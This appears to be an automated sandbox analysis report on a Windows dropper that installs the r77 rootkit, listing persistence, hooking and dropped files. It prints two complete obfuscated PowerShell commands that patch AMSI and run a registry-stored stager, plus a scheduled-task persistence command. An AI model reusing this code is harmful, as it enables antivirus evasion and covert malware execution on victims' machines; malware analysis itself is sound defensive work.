Source: Install.exeStatic file information: File size 4713759 > 1048576
Source: Install.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source: Binary string: x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe

Data Obfuscation

barindex
.NET source code contains potential unpacker
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: NewEngineState=Availablefunction Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssemJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssemJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssemJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)Jump to behavior
Obfuscated command line found
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E40070C pushad ; ret 4_2_00007FFF7E40070E
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E4006CE pushad ; ret 4_2_00007FFF7E4006D0
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E4035CF push cs; iretd 4_2_00007FFF7E4035D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F7317 push ebx; iretd 8_2_00007FFF7E3F731A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F5097 push eax; iretd 8_2_00007FFF7E3F50A1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F44E7 push esp; retf 8_2_00007FFF7E3F44E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5274 pushad ; retf 8_2_00007FFF7E4C5275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5F76 push ebx; retf 8_2_00007FFF7E4C5F78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5C3C push esi; retf 8_2_00007FFF7E4C5C3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C6156 push ecx; retf 8_2_00007FFF7E4C6158
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000E228 push rax; retf 22_2_000000014000E229
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014001439D push rcx; retf 003Fh22_2_000000014001439E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFF7E3E6450 push ebx; iretd 25_2_00007FFF7E3E645A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFF7E3E41C7 push esp; retf 25_2_00007FFF7E3E41C8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F070C pushad ; ret 30_2_00007FFF7E3F070E
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F06CE pushad ; ret 30_2_00007FFF7E3F06D0
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F70FA push ebp; retf 30_2_00007FFF7E3F70FB
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F35CF push cs; iretd 30_2_00007FFF7E3F35D1
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E40070C pushad ; ret 33_2_00007FFF7E40070E
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E4006CE pushad ; ret 33_2_00007FFF7E4006D0
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E4035CF push cs; iretd 33_2_00007FFF7E4035D1
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400146AD push rcx; retf 003Fh39_2_00000001400146AE
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E348 push rax; retf 39_2_000000014000E351
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E350 push rax; retf 39_2_000000014000E351
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE94CD push rcx; retf 003Fh42_2_000001AFDDCE94CE
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD142D8 push rax; retf 42_2_000001AFDDD142D9
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD1A6CD push rcx; retf 003Fh42_2_000001AFDDD1A6CE
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B994CD push rcx; retf 003Fh44_2_00000240B2B994CE
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC42D8 push rax; retf 44_2_00000240B2BC42D9
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE94CD push rcx; retf 003Fh47_2_000001CAF3CE94CE
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D142D0 push rax; retf 47_2_000001CAF3D142D9
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.drStatic PE information: section name: .nQuHRq
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.drStatic PE information: section name: .9SAT
Source: initial sampleStatic PE information: section name: .9SAT entropy: 6.83589844593

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\34432.exeFile created: C:\Users\user\AppData\Roaming\Chrome\chrome.exeJump to dropped file
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\34432.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Windows\System32\nslookup.exeFile created: C:\Windows\Tasks\nslooksvc32.job

Hooking and other Techniques for Hiding and Protection

barindex
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Hooks processes query functions (used to hide processes)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF
Source: C:\Windows\System32\nslookup.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node nslookstager
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD01F20 GetCurrentThread,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,42_2_000001AFDDD01F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
